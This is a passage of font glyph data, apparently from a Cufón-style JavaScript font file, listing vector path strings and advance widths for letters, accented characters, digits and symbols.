r0,-42r58,0r14,-55r-52,0r0,-42r62,0r15,-61r43,0r-15,61r47,0r15,-61r43,0r-15,61r44,0r0,42xm188,-159r-47,0r-14,55r47,0","w":312},{"d":"70,35v29,11,71,7,60,-35r-97,0r0,-262r68,0r0,211r121,0r0,51r-52,0v8,63,-42,84,-100,70r0,-35","w":229},{"d":"271,-262r-96,262r-75,0r-96,-262r71,0r63,184r64,-184r69,0","w":274},{"d":"175,0r-153,0r0,-46r43,0r0,-169r-43,0r0,-47r153,0r0,47r-43,0r0,169r43,0r0,46","w":196},{"d":"114,-274r-51,104r-41,0r27,-104r65,0xm210,-274r-52,104r-41,0r28,-104r65,0","w":211},{"d":"93,-176v42,-43,135,-35,135,48r0,128r-63,0r0,-98v-1,-29,-2,-56,-35,-54v-15,1,-25,5,-37,12r0,140r-63,0r0,-197r63,0r0,21","w":256},{"d":"268,-139r-224,0r0,-47r224,0r0,47xm268,-47r-224,0r0,-47r224,0r0,47","w":312},{"d":"275,0r-70,0r-18,-53r-97,0r-18,53r-68,0r97,-262r78,0xm171,-101r-32,-94r-32,94r64,0xm199,-361r0,4r-62,65r-43,0r44,-69r61,0","w":279},{"d":"202,-226r-46,0r-33,-38r-32,38r-46,0r57,-69r44,0xm124,-204v66,0,108,41,108,105v0,64,-42,105,-108,105v-67,0,-109,-40,-109,-105v0,-66,42,-105,109,-105xm124,-38v33,0,42,-24,42,-60v0,-35,-9,-60,-42,-61v-35,0,-43,26,-43,61v0,35,9,60,43,60","w":247},{"d":"236,0r-74,0r-42,-59r-43,59r-72,0r77,-99r-76,-98r74,0r41,58r42,-58r72,0r-76,97","w":240},{"d":"232,-291r-47,0r-32,-39r-33,39r-45,0r56,-69r44,0xm153,-267v84,0,135,52,135,136v0,82,-51,136,-135,136v-84,0,-135,-54,-135,-136v0,-84,51,-136,135,-136xm153,-44v47,0,65,-38,65,-87v0,-50,-19,-87,-65,-87v-47,0,-65,38,-65,87v0,50,18,87,65,87","w":306},{"d":"105,25v35,9,66,3,60,-43v-6,-52,21,-134,-35,-134v-15,0,-25,5,-37,12r0,140r-63,0r0,-197r63,0r0,21v42,-43,135,-35,135,48r0,127v5,64,-61,87,-123,71r0,-45","w":256},{"d":"264,-262r-97,161r0,101r-67,0r0,-98r-98,-164r76,0r57,102r54,-102r75,0","w":265},{"d":"156,-317v20,0,29,-14,28,-36r39,0v9,65,-78,85,-118,50v-12,-11,-17,-28,-17,-50r39,0v0,23,8,36,29,36xm88,-132v0,65,39,93,108,89r0,-52r-52,0r0,-49r121,0r0,129v-24,9,-69,20,-105,20v-88,0,-142,-50,-142,-136v0,-84,58,-137,145,-136v42,1,68,7,101,23r0,62v-33,-9,-49,-37,-93,-36v-54,1,-83,33,-83,86","w":291},{"d":"-10,24v37,8,62,6,62,-42r0,-137r-37,0r0,-42r100,0r0,201v5,64,-65,80,-125,66r0,-46xm115,-226r-67,0r0,-48r67,0r0,48","w":145},{"d":"152,69r-117,0r0,-42r62,0r0,-258r-62,0r0,-43r117,0r0,343","w":195},{"d":"281,-180v27,99,-27,185,-128,185v-84,0,-135,-54,-135,-136v0,-84,51,-137,135,-136v54,0,92,20,113,54v35,5,32,-30,24,-54r41,0v13,44,-4,89,-50,87xm153,-44v47,0,65,-38,65,-87v0,-50,-19,-87,-65,-87v-47,0,-65,38,-65,87v0,50,18,87,65,87","w":328},{"d":"238,-211r-82,0r0,211r-67,0r0,-211r-82,0r0,-51r231,0r0,51","w":245},{"d":"108,-267v53,0,86,32,85,84v0,51,-33,84,-85,84v-53,0,-86,-32,-86,-84v0,-52,33,-84,86,-84xm108,-135v26,-1,34,-18,33,-48v-1,-27,-6,-49,-33,-49v-27,0,-34,22,-34,49v0,27,6,49,34,48","w":215},{"d":"158,-203v53,1,78,44,78,102v0,81,-74,129,-143,91r0,82r-63,0r0,-269r63,0r0,20v19,-14,35,-26,65,-26xm93,-45v45,14,81,-7,78,-55v8,-54,-44,-66,-78,-44r0,99","w":251},{"d":"260,69v-57,15,-113,-6,-98,-74v1,-9,1,-14,1,-17v-40,45,-135,35,-135,-47r0,-128r64,0r0,98v0,32,2,55,34,53v12,-1,28,-5,37,-11r0,-140r64,0r0,197r-27,0v-11,38,31,47,60,34r0,35","w":256},{"d":"47,-227v33,1,61,-5,62,-35r59,0r0,216r53,0r0,46r-174,0r0,-46r55,0r0,-138r-55,0r0,-43"},{"d":"16,-97v0,-84,76,-130,143,-92r0,-28r-58,0r0,-37r58,0r0,-20r63,0r0,20r23,0r0,37r-23,0r0,217r-63,0r0,-21v-20,16,-33,25,-64,26v-53,1,-79,-46,-79,-102xm81,-98v-8,53,45,67,78,44r0,-97v-41,-17,-82,6,-78,53","w":251},{"d":"93,-176v42,-43,135,-35,135,48r0,128r-63,0r0,-98v-1,-29,-2,-56,-35,-54v-15,1,-25,5,-37,12r0,140r-63,0r0,-274r63,0r0,98","w":256},{"d":"275,0r-70,0r-18,-53r-97,0r-18,53r-68,0r97,-262r78,0xm171,-101r-32,-94r-32,94r64,0xm213,-292r-52,0r0,-48r52,0r0,48xm119,-292r-52,0r0,-48r52,0r0,48","w":279},{"d":"93,0r-63,0r0,-197r63,0r0,197xm52,-277v15,7,44,30,43,-5r30,0v6,54,-45,68,-75,38v-13,-8,-23,1,-22,18r-30,0v-1,-35,22,-66,54,-51","w":123},{"d":"221,-211r-120,0r0,49r111,0r0,50r-111,0r0,112r-68,0r0,-262r188,0r0,51","w":234},{"d":"333,-93r-306,0r0,-47r306,0r0,47","w":360},{"d":"215,-274r-139,331r-54,0r138,-331r55,0","w":248},{"d":"79,-62v-1,36,56,28,70,10r0,-41v-28,5,-68,0,-70,31xm150,-130v-6,-50,-85,-23,-118,-16r0,-47v65,-15,180,-24,180,59r0,134r-63,0r0,-21v-33,41,-138,33,-134,-36v4,-67,70,-68,135,-73","w":240},{"d":"30,-203v-5,-68,60,-80,123,-69r0,45v-27,-6,-60,-12,-60,28r0,199r-63,0r0,-203","w":124},{"d":"259,69v-53,13,-108,-2,-99,-64v-79,3,-131,-27,-130,-100r0,-167r68,0r0,164v-1,36,14,53,48,54v35,0,49,-18,49,-54r0,-164r68,0v-5,104,26,242,-65,260v-9,42,30,49,61,36r0,35","w":292},{"d":"171,-226r-43,0r-62,-65r0,-4r61,0"},{"d":"175,0r-153,0r0,-46r43,0r0,-169r-43,0r0,-47r153,0r0,47r-43,0r0,169r43,0r0,46xm139,-292r-43,0r-62,-65r0,-4r61,0","w":196},{"d":"223,0r-190,0r0,-262r190,0r0,51r-122,0r0,45r113,0r0,51r-113,0r0,64r122,0r0,51xm201,-292r-52,0r0,-48r52,0r0,48xm107,-292r-52,0r0,-48r52,0r0,48","w":245},{"d":"16,-97v0,-84,76,-130,143,-92r0,-85r63,0r0,274r-63,0r0,-21v-20,16,-33,25,-64,26v-53,1,-79,-46,-79,-102xm81,-98v-8,53,45,67,78,44r0,-97v-41,-17,-82,6,-78,53","w":251},{"d":"259,62r-262,0r0,-38r262,0r0,38"},{"d":"105,-267v54,0,80,29,79,85v0,56,-24,86,-79,86v-54,0,-80,-30,-80,-85v0,-56,26,-86,80,-86xm322,-262r-138,262r-47,0r137,-262r48,0xm354,-165v54,0,79,29,79,84v0,56,-24,86,-79,86v-55,0,-80,-30,-80,-85v-1,-56,27,-85,80,-85xm105,-133v26,0,28,-18,28,-49v0,-30,-2,-47,-28,-47v-27,0,-28,17,-28,48v0,32,2,48,28,48xm353,-32v25,0,28,-17,28,-48v0,-31,-3,-48,-28,-48v-25,0,-28,17,-28,48v0,31,3,48,28,48","w":457},{"d":"118,20r-38,54r-38,0r25,-54r51,0xm97,-85v-8,44,25,53,59,40r0,43v-55,13,-122,9,-122,-60r0,-93r-26,0r0,-42r26,0r0,-57r63,0r0,57r59,0r0,42r-59,0r0,70","w":164},{"d":"268,0r-67,0r0,-115r-100,0r0,115r-68,0r0,-262r68,0r0,96r100,0r0,-96r67,0r0,262","w":301},{"d":"178,-329v12,1,14,-10,15,-21r38,0v-2,36,-15,58,-50,58v-23,0,-32,-20,-52,-20v-12,0,-15,8,-15,21r-39,0v1,-32,19,-58,50,-58v24,0,33,18,53,20xm153,-267v84,0,135,52,135,136v0,82,-51,136,-135,136v-84,0,-135,-54,-135,-136v0,-84,51,-136,135,-136xm153,-44v47,0,65,-38,65,-87v0,-50,-19,-87,-65,-87v-47,0,-65,38,-65,87v0,50,18,87,65,87","w":306},{"d":"182,-274r-10,104r-40,0r-11,-104r61,0xm90,-274r-10,104r-40,0r-11,-104r61,0","w":211},{"d":"33,-262v98,1,219,-18,216,83v-2,76,-62,101,-148,94r0,85r-68,0r0,-262xm101,-134v43,1,80,-1,79,-44v-2,-37,-40,-36,-79,-35r0,79","w":263},{"d":"124,-204v66,0,108,41,108,105v0,64,-42,105,-108,105v-67,0,-109,-40,-109,-105v0,-66,42,-105,109,-105xm124,-38v33,0,42,-24,42,-60v0,-35,-9,-60,-42,-61v-35,0,-43,26,-43,61v0,35,9,60,43,60","w":247},{"d":"274,-93r-94,0r0,93r-48,0r0,-93r-94,0r0,-47r94,0r0,-93r48,0r0,93r94,0r0,47","w":312},{"d":"97,-85v-8,44,25,53,59,40r0,43v-55,13,-122,9,-122,-60r0,-93r-26,0r0,-42r26,0r0,-57r63,0r0,57r59,0r0,42r-59,0r0,70","w":164},{"d":"128,-267v82,-1,108,54,108,136v0,82,-24,136,-108,136v-83,0,-108,-52,-108,-136v0,-83,27,-136,108,-136xm128,-43v38,0,40,-39,40,-88v0,-51,-2,-83,-40,-88v-38,4,-40,37,-40,88v0,49,2,88,40,88"},{"d":"92,-156v55,-37,153,-15,146,67v-5,60,-39,95,-105,94v-76,0,-109,-45,-109,-122v0,-116,77,-166,192,-145r0,51v-53,-18,-124,-4,-124,55xm133,-39v25,0,36,-20,37,-47v2,-44,-45,-49,-79,-37v-1,44,3,84,42,84"},{"d":"199,-237r-141,0r0,-37r141,0r0,37xm126,-46v12,-1,28,-5,37,-11r0,-140r64,0r0,197r-64,0r0,-22v-40,45,-135,35,-135,-47r0,-128r64,0r0,98v0,32,2,55,34,53","w":256},{"d":"312,-317v13,44,-3,91,-49,88r0,134v0,68,-45,100,-117,100v-72,0,-117,-31,-116,-100r0,-167r68,0r0,164v-1,36,14,53,48,54v35,0,49,-18,49,-54r0,-164v34,-2,84,11,83,-25v0,-11,-6,-20,-7,-30r41,0","w":304},{"d":"244,-17v-27,12,-51,22,-92,22v-85,-2,-134,-49,-134,-136v0,-87,50,-136,134,-136v38,0,68,9,92,22r0,63r-7,0v-20,-14,-40,-35,-75,-34v-51,1,-74,34,-74,86v0,53,25,85,75,85v33,0,56,-19,74,-35r7,0r0,63","w":260},{"d":"154,-226r-65,0r0,-48r65,0r0,48xm200,-10v-76,35,-185,8,-185,-88v0,-97,108,-126,185,-89r0,54v-26,-3,-34,-25,-67,-25v-35,0,-52,25,-52,60v0,67,82,71,110,34r9,0r0,54","w":211},{"d":"189,-226r-46,0r-33,-38r-32,38r-46,0r57,-69r44,0xm118,-161v-20,0,-47,11,-31,27v39,17,114,10,114,71v0,76,-126,80,-184,53r0,-52v26,8,47,25,83,25v24,0,48,-11,31,-27v-44,-14,-114,-13,-113,-73v2,-70,116,-78,174,-52r0,50v-23,-7,-43,-22,-74,-22","w":213},{"d":"259,-286r-262,0r0,-37r262,0r0,37"},{"d":"276,-96r-235,97r0,-50r165,-67r-165,-68r0,-50r235,98r0,40","w":312},{"d":"88,-132v0,65,39,93,108,89r0,-52r-52,0r0,-49r121,0r0,129v-24,9,-69,20,-105,20v-88,0,-142,-50,-142,-136v0,-84,58,-137,145,-136v42,1,68,7,101,23r0,62v-33,-9,-49,-37,-93,-36v-54,1,-83,33,-83,86","w":291},{"d":"276,-153v3,39,-8,72,-26,91r67,58r0,4r-84,0r-24,-22v-52,47,-192,33,-188,-53v2,-39,24,-58,49,-72v-18,-13,-35,-27,-36,-58v0,-81,183,-87,183,-6v0,39,-27,57,-60,68r54,47r0,-57r65,0xm131,-165v26,-12,29,-74,-12,-64v-34,11,-10,54,12,64xm103,-118v-32,32,3,96,57,75v6,-2,12,-4,18,-9","w":310},{"d":"207,-226r-47,0r-32,-38r-32,38r-46,0r56,-69r44,0xm126,-46v12,-1,28,-5,37,-11r0,-140r64,0r0,197r-64,0r0,-22v-40,45,-135,35,-135,-47r0,-128r64,0r0,98v0,32,2,55,34,53","w":256},{"d":"106,-190v6,-65,66,-85,137,-74r0,49v-33,-6,-75,-9,-75,32r-4,29r50,0r0,39r-55,0v-10,76,-18,155,-109,150r-38,-3r0,-49v32,7,67,6,73,-33r10,-65r-32,0r0,-39r37,0"},{"d":"140,-218v-31,0,-65,18,-42,41v52,23,145,17,145,95v0,96,-151,103,-224,67r0,-63r8,0v24,19,58,32,96,34v30,2,65,-15,43,-41v-52,-27,-147,-17,-145,-99v3,-87,139,-97,212,-65r0,60r-8,0v-20,-15,-51,-29,-85,-29"},{"d":"186,-295r-56,69r-45,0r-56,-69r46,0r33,40r32,-40r46,0xm200,0r-185,0r0,-41r104,-110r-100,0r0,-46r179,0r0,39r-102,111r104,0r0,47","w":214},{"d":"157,-329v12,1,15,-9,15,-21r39,0v-3,35,-16,58,-50,58v-23,0,-33,-20,-53,-20v-12,0,-14,9,-15,21r-38,0v1,-32,19,-58,50,-58v24,0,33,18,52,20xm275,0r-70,0r-18,-53r-97,0r-18,53r-68,0r97,-262r78,0xm171,-101r-32,-94r-32,94r64,0","w":279},{"d":"101,-143v41,0,79,2,79,-39v0,-37,-42,-32,-79,-32r0,71xm250,-190v0,43,-22,63,-52,78r87,112r-82,0r-71,-96r-31,0r0,96r-68,0r0,-262v93,4,215,-22,217,72xm72,35v32,11,70,8,61,-39r39,0v11,63,-39,90,-100,74r0,-35","w":281},{"d":"158,-215r-71,0r0,-47r71,0r0,47xm88,-76v0,49,77,32,101,13r7,0r0,53v-58,25,-178,24,-176,-54v2,-52,33,-72,72,-87r0,-40r62,0r0,59v-31,9,-66,19,-66,56","w":222},{"d":"144,-22r-106,-82r0,-24r106,-81r0,54r-53,39r53,40r0,54xm254,-22r-106,-82r0,-24r106,-81r0,54r-53,39r53,40r0,54","w":305},{"d":"119,-70r45,-127r65,0r-110,269r-68,0r31,-73r-77,-196r67,0","w":234},{"d":"163,-291r-65,0r0,-48r65,0r0,48xm223,0r-190,0r0,-262r190,0r0,51r-122,0r0,45r113,0r0,51r-113,0r0,64r122,0r0,51","w":245},{"d":"229,-197r-76,197r-72,0r-76,-197r67,0r46,135r45,-135r66,0","w":233},{"d":"124,-204v66,0,108,41,108,105v0,64,-42,105,-108,105v-67,0,-109,-40,-109,-105v0,-66,42,-105,109,-105xm124,-38v33,0,42,-24,42,-60v0,-35,-9,-60,-42,-61v-35,0,-43,26,-43,61v0,35,9,60,43,60xm167,-226r-43,0r-62,-65r0,-4r61,0","w":247},{"d":"128,-262v95,-1,153,42,153,131v0,88,-60,133,-155,131r-93,0r0,-262r95,0xm101,-49v72,5,110,-18,110,-82v0,-64,-39,-87,-110,-82r0,164","w":298},{"w":123},{"d":"114,-56v49,35,113,-8,105,-75v-2,-18,-4,-40,-9,-53xm191,-207v-51,-33,-104,8,-104,76v0,21,3,39,9,53xm288,-131v7,111,-112,166,-207,120r-27,36r-36,0r40,-53v-24,-23,-40,-57,-40,-103v0,-112,112,-165,206,-120r21,-29r37,0r-34,46v24,22,37,58,40,103","w":306},{"d":"79,-87v1,62,104,55,135,25r7,0r0,51v-83,35,-206,16,-206,-87v0,-67,46,-106,113,-106v71,0,101,42,96,117r-145,0xm161,-124v5,-40,-43,-49,-69,-31v-8,6,-12,17,-13,31r82,0xm166,-226r-43,0r-62,-65r0,-4r61,0","w":239},{"d":"105,-128r-65,0r0,-69r65,0r0,69xm116,-69r-63,134r-39,0r34,-134r68,0","w":144},{"d":"146,-44v35,0,49,-18,49,-54r0,-164r68,0r0,167v0,68,-45,100,-117,100v-72,0,-117,-31,-116,-100r0,-167r68,0r0,164v-1,36,14,53,48,54xm196,-292r-43,0r-62,-65r0,-4r61,0","w":292},{"d":"79,-62v-1,36,56,28,70,10r0,-41v-28,5,-68,0,-70,31xm150,-130v-6,-50,-85,-23,-118,-16r0,-47v18,-4,38,-8,62,-9v-49,-18,-34,-101,25,-101v30,0,57,23,56,53v0,23,-15,43,-33,49v42,6,70,20,70,67r0,134r-63,0r0,-21v-33,41,-138,33,-134,-36v4,-67,70,-68,135,-73xm119,-224v15,0,24,-12,24,-26v1,-13,-11,-26,-24,-26v-13,0,-25,13,-24,26v0,14,9,26,24,26","w":240},{"d":"119,-121r63,0r0,-93r-26,0xm182,-71r-83,0r-28,71r-70,0r107,-262r263,0r0,51r-123,0r0,45r114,0r0,51r-114,0r0,64r123,0r0,51r-189,0r0,-71xm296,-361r0,4r-62,65r-43,0r44,-69r61,0","w":393},{"d":"153,-91r-134,0r0,-51r134,0r0,51","w":172},{"d":"93,0r-63,0r0,-274r63,0r0,274xm194,-103r-64,0r0,-69r64,0r0,69","w":200},{"d":"119,-70r45,-127r65,0r-110,269r-68,0r31,-73r-77,-196r67,0xm192,-226r-52,0r0,-48r52,0r0,48xm98,-226r-52,0r0,-48r52,0r0,48","w":234},{"d":"223,0r-190,0r0,-262r190,0r0,51r-122,0r0,45r113,0r0,51r-113,0r0,64r122,0r0,51xm172,-292r-43,0r-62,-65r0,-4r61,0","w":245},{"d":"236,0r-220,0r0,-49r130,-162r-124,0r0,-51r207,0r0,50r-131,161r138,0r0,51xm197,-361r0,4r-62,65r-43,0r44,-69r61,0","w":249},{"d":"274,0r-236,0r0,-47r94,0r0,-73r-94,0r0,-47r94,0r0,-93r48,0r0,93r94,0r0,47r-94,0r0,73r94,0r0,47","w":312},{"d":"148,-264v13,1,15,-9,15,-20r39,0v-3,35,-16,58,-50,58v-23,0,-33,-18,-53,-20v-13,-1,-14,9,-15,21r-38,0v0,-33,19,-58,50,-58v24,1,33,16,52,19xm124,-204v66,0,108,41,108,105v0,64,-42,105,-108,105v-67,0,-109,-40,-109,-105v0,-66,42,-105,109,-105xm124,-38v33,0,42,-24,42,-60v0,-35,-9,-60,-42,-61v-35,0,-43,26,-43,61v0,35,9,60,43,60","w":247},{"d":"173,-267v82,0,153,71,153,152v0,81,-72,152,-153,152v-81,0,-152,-71,-152,-152v0,-81,70,-152,152,-152xm174,4v64,0,118,-55,118,-119v0,-64,-55,-120,-118,-120v-64,0,-119,56,-119,120v0,64,55,119,119,119xm235,-152v0,24,-15,36,-33,44r57,65r-48,0r-46,-56r-15,0r0,56r-37,0r0,-151v53,2,123,-13,122,42xm150,-126v24,1,44,-1,44,-23v0,-20,-22,-20,-44,-19r0,42","w":346},{"d":"79,35v27,9,67,10,60,-31v-49,2,-87,-5,-120,-19r0,-63r8,0v24,19,58,32,96,34v30,2,65,-15,43,-41v-52,-27,-147,-17,-145,-99v3,-87,139,-97,212,-65r0,60r-8,0v-20,-15,-51,-29,-85,-29v-31,0,-65,18,-42,41v52,23,148,17,145,95v-1,41,-28,67,-65,78v12,64,-38,90,-99,74r0,-35"},{"d":"118,-161v-20,0,-47,11,-31,27v39,17,114,10,114,71v0,76,-126,80,-184,53r0,-52v26,8,47,25,83,25v24,0,48,-11,31,-27v-44,-14,-114,-13,-113,-73v2,-70,116,-78,174,-52r0,50v-23,-7,-43,-22,-74,-22","w":213},{"d":"90,-274r-10,104r-40,0r-11,-104r61,0","w":119},{"d":"189,-295r-56,69r-44,0r-56,-69r46,0r32,40r33,-40r45,0xm118,-161v-20,0,-47,11,-31,27v39,17,114,10,114,71v0,76,-126,80,-184,53r0,-52v26,8,47,25,83,25v24,0,48,-11,31,-27v-44,-14,-114,-13,-113,-73v2,-70,116,-78,174,-52r0,50v-23,-7,-43,-22,-74,-22","w":213},{"d":"244,-17v-27,12,-51,22,-92,22v-85,-2,-134,-49,-134,-136v0,-87,50,-136,134,-136v38,0,68,9,92,22r0,63r-7,0v-20,-14,-40,-35,-75,-34v-51,1,-74,34,-74,86v0,53,25,85,75,85v33,0,56,-19,74,-35r7,0r0,63xm208,-361r0,4r-62,65r-43,0r44,-69r61,0","w":260},{"d":"264,-262r-97,161r0,101r-67,0r0,-98r-98,-164r76,0r57,102r54,-102r75,0xm206,-292r-52,0r0,-48r52,0r0,48xm112,-292r-52,0r0,-48r52,0r0,48","w":265},{"d":"124,-204v66,0,108,41,108,105v0,64,-42,105,-108,105v-67,0,-109,-40,-109,-105v0,-66,42,-105,109,-105xm124,-38v33,0,42,-24,42,-60v0,-35,-9,-60,-42,-61v-35,0,-43,26,-43,61v0,35,9,60,43,60xm186,-295r0,4r-62,65r-43,0r44,-69r61,0","w":247},{"d":"207,-291r-47,0r-32,-39r-33,39r-45,0r56,-69r44,0xm223,0r-190,0r0,-262r190,0r0,51r-122,0r0,45r113,0r0,51r-113,0r0,64r122,0r0,51","w":245},{"d":"98,0r-66,0r0,-69r66,0r0,69","w":130},{"d":"146,-357v31,0,56,23,56,53v0,30,-26,53,-56,53v-31,1,-56,-23,-56,-53v0,-30,26,-53,56,-53xm146,-278v14,0,23,-13,24,-26v1,-14,-10,-26,-24,-26v-14,0,-25,12,-24,26v1,13,10,26,24,26xm146,-44v35,0,49,-18,49,-54r0,-164r68,0r0,167v0,68,-45,100,-117,100v-72,0,-117,-31,-116,-100r0,-167r68,0r0,164v-1,36,14,53,48,54","w":292},{"d":"39,-250v63,-28,193,-27,187,62v-5,70,-62,103,-106,138r118,0r0,50r-205,0r0,-43v45,-39,113,-69,124,-136v-2,-55,-86,-37,-112,-13r-6,0r0,-58"},{"d":"109,-262r-8,187r-57,0r-8,-187r73,0xm108,0r-71,0r0,-46r71,0r0,46","w":144},{"d":"214,-206v-27,-10,-95,-34,-110,4v5,25,39,24,62,33v33,13,61,24,63,62v1,30,-19,46,-37,59v73,51,7,117,-76,117v-22,0,-61,-4,-77,-10r0,-51v27,9,100,34,113,-4v-4,-26,-39,-25,-61,-33v-34,-13,-62,-25,-64,-63v-1,-32,19,-41,37,-59v-20,-12,-32,-23,-32,-51v0,-68,117,-75,182,-55r0,51xm90,-102v2,30,76,54,76,6v0,-27,-34,-27,-57,-36v-9,7,-20,15,-19,30"},{"d":"201,-360r-56,69r-44,0r-57,-69r47,0r32,40r32,-40r46,0xm238,-211r-82,0r0,211r-67,0r0,-211r-82,0r0,-51r231,0r0,51","w":245},{"d":"190,-295r0,4r-62,65r-43,0r44,-69r61,0"},{"d":"186,-176r-60,0r0,-57r60,0r0,57xm274,-93r-236,0r0,-47r236,0r0,47xm186,0r-60,0r0,-57r60,0r0,57","w":312},{"d":"140,-218v-31,0,-65,18,-42,41v52,23,145,17,145,95v0,96,-151,103,-224,67r0,-63r8,0v24,19,58,32,96,34v30,2,65,-15,43,-41v-52,-27,-147,-17,-145,-99v3,-87,139,-97,212,-65r0,60r-8,0v-20,-15,-51,-29,-85,-29xm202,-361r0,4r-62,65r-43,0r44,-69r61,0"},{"d":"201,-226r-52,0r0,-48r52,0r0,48xm107,-226r-52,0r0,-48r52,0r0,48"},{"d":"101,-143v41,0,79,2,79,-39v0,-37,-42,-32,-79,-32r0,71xm250,-190v0,43,-22,63,-52,78r87,112r-82,0r-71,-96r-31,0r0,96r-68,0r0,-262v93,4,215,-22,217,72xm204,-361r0,4r-62,65r-43,0r44,-69r61,0","w":281},{"d":"171,-14v-17,18,-61,23,-78,1r0,85r-63,0r0,-269r63,0r0,140v17,15,56,16,73,0r0,-140r64,0r0,197r-56,0","w":259},{"d":"233,-210r-119,210r-75,0r123,-212r-135,0r0,-50r206,0r0,52"},{"d":"98,-82r-66,0r0,-69r66,0r0,69","w":130},{"d":"223,0r-189,0r0,-83r-30,24r0,-45r30,-24r0,-134r68,0r0,86r60,-49r0,45r-60,48r0,81r121,0r0,51","w":231},{"d":"208,-106v32,-1,27,-39,30,-71r47,0v16,101,-82,159,-140,84v-11,-14,-19,-35,-40,-35v-32,0,-28,39,-30,71r-47,0v0,-68,18,-118,76,-120v59,-2,61,56,104,71","w":312},{"d":"161,20r-38,54r-38,0r25,-54r51,0xm140,-218v-31,0,-65,18,-42,41v52,23,145,17,145,95v0,96,-151,103,-224,67r0,-63r8,0v24,19,58,32,96,34v30,2,65,-15,43,-41v-52,-27,-147,-17,-145,-99v3,-87,139,-97,212,-65r0,60r-8,0v-20,-15,-51,-29,-85,-29"},{"d":"126,-46v12,-1,28,-5,37,-11r0,-140r64,0r0,197r-64,0r0,-22v-40,45,-135,35,-135,-47r0,-128r64,0r0,98v0,32,2,55,34,53xm201,-226r-52,0r0,-48r52,0r0,48xm107,-226r-52,0r0,-48r52,0r0,48","w":256},{"d":"200,0r-185,0r0,-41r104,-110r-100,0r0,-46r179,0r0,39r-102,111r104,0r0,47","w":214},{"d":"79,-62v-1,36,56,28,70,10r0,-41v-28,5,-68,0,-70,31xm150,-130v-6,-50,-85,-23,-118,-16r0,-47v65,-15,180,-24,180,59r0,134r-63,0r0,-21v-33,41,-138,33,-134,-36v4,-67,70,-68,135,-73xm164,-226r-43,0r-62,-65r0,-4r61,0","w":240},{"d":"177,-329v12,1,15,-9,15,-21r39,0v-3,35,-16,58,-50,58v-23,0,-33,-20,-53,-20v-12,0,-14,9,-15,21r-38,0v0,-33,19,-58,50,-58v24,0,33,18,52,20xm271,0r-65,0r-111,-180r0,180r-62,0r0,-262r81,0r96,150r0,-150r61,0r0,262","w":304},{"d":"67,35v27,9,67,10,61,-30v-68,-2,-110,-34,-113,-103v-5,-97,108,-126,185,-89r0,54v-26,-3,-34,-25,-67,-25v-35,0,-52,25,-52,60v0,67,82,71,110,34r9,0r0,54v-8,4,-22,9,-33,11v10,60,-42,84,-100,69r0,-35","w":211},{"d":"98,-170r-41,0r-51,-104r64,0","w":119},{"d":"129,-317v20,0,29,-14,29,-36r39,0v8,64,-79,85,-118,50v-12,-11,-18,-28,-18,-50r39,0v0,23,8,36,29,36xm223,0r-190,0r0,-262r190,0r0,51r-122,0r0,45r113,0r0,51r-113,0r0,64r122,0r0,51","w":245},{"d":"175,0r-153,0r0,-46r43,0r0,-169r-43,0r0,-47r153,0r0,47r-43,0r0,169r43,0r0,46xm123,-329v12,1,15,-9,15,-21r39,0v-3,35,-16,58,-50,58v-23,0,-33,-20,-53,-20v-12,0,-14,9,-15,21r-38,0v1,-33,19,-58,50,-58v24,0,33,18,52,20","w":196},{"d":"236,0r-220,0r0,-49r130,-162r-124,0r0,-51r207,0r0,50r-131,161r138,0r0,51","w":249},{"d":"90,35v27,9,68,11,61,-30v-85,-2,-133,-49,-133,-136v0,-87,50,-136,134,-136v38,0,68,9,92,22r0,63r-7,0v-20,-14,-40,-35,-75,-34v-51,1,-74,34,-74,86v0,53,25,85,75,85v33,0,56,-19,74,-35r7,0r0,63v-15,6,-34,15,-54,18v11,60,-42,84,-100,69r0,-35","w":260},{"d":"223,0r-190,0r0,-262r190,0r0,51r-122,0r0,45r113,0r0,51r-113,0r0,64r122,0r0,51xm193,-361r0,4r-62,65r-43,0r44,-69r61,0","w":245},{"d":"271,0r-65,0r-111,-180r0,180r-62,0r0,-262r81,0r96,150r0,-150r61,0r0,262","w":304},{"d":"210,-360r-56,69r-44,0r-57,-69r47,0r32,40r33,-40r45,0xm140,-218v-31,0,-65,18,-42,41v52,23,145,17,145,95v0,96,-151,103,-224,67r0,-63r8,0v24,19,58,32,96,34v30,2,65,-15,43,-41v-52,-27,-147,-17,-145,-99v3,-87,139,-97,212,-65r0,60r-8,0v-20,-15,-51,-29,-85,-29"},{"d":"226,-291r-46,0r-33,-39r-32,39r-46,0r57,-69r44,0xm244,-17v-27,12,-51,22,-92,22v-85,-2,-134,-49,-134,-136v0,-87,50,-136,134,-136v38,0,68,9,92,22r0,63r-7,0v-20,-14,-40,-35,-75,-34v-51,1,-74,34,-74,86v0,53,25,85,75,85v33,0,56,-19,74,-35r7,0r0,63","w":260},{"d":"158,-203v53,1,78,44,78,102v0,81,-74,129,-143,91r0,82r-63,0r0,-346r63,0r0,97v19,-14,35,-26,65,-26xm93,-45v45,14,81,-7,78,-55v8,-54,-44,-66,-78,-44r0,99","w":251},{"d":"227,-87v0,64,102,54,132,25r7,0r0,51v-45,23,-133,23,-167,-9v-18,15,-42,26,-75,26v-67,1,-109,-39,-109,-105v0,-99,121,-134,184,-79v17,-15,44,-26,75,-26v71,0,101,42,96,117r-143,0xm307,-124v4,-38,-41,-50,-67,-31v-8,6,-12,17,-13,31r80,0xm124,-38v33,0,42,-24,42,-60v0,-35,-9,-60,-42,-61v-35,0,-43,26,-43,61v0,35,9,60,43,60","w":384},{"d":"175,-138v31,6,56,21,56,59v0,95,-135,96,-206,68r0,-58v25,6,51,24,81,23v29,-1,57,-6,57,-38v-1,-35,-42,-29,-77,-30r0,-46v34,-1,73,5,72,-30v0,-22,-24,-26,-46,-26v-31,-1,-53,16,-80,22r0,-57v58,-22,192,-33,192,49v0,32,-22,56,-49,61r0,3"},{"d":"308,0r-67,0r0,-175r-49,113r-46,0r-49,-113r0,175r-64,0r0,-262r79,0r59,132r58,-132r79,0r0,262","w":341},{"d":"118,-161v-20,0,-47,11,-31,27v39,17,114,10,114,71v0,76,-126,80,-184,53r0,-52v26,8,47,25,83,25v24,0,48,-11,31,-27v-44,-14,-114,-13,-113,-73v2,-70,116,-78,174,-52r0,50v-23,-7,-43,-22,-74,-22xm177,-295r0,4r-62,65r-43,0r44,-69r61,0","w":213},{"d":"204,-226r-46,0r-32,-38r-33,38r-46,0r57,-69r44,0xm79,-87v1,62,104,55,135,25r7,0r0,51v-83,35,-206,16,-206,-87v0,-67,46,-106,113,-106v71,0,101,42,96,117r-145,0xm161,-124v5,-40,-43,-49,-69,-31v-8,6,-12,17,-13,31r82,0","w":239},{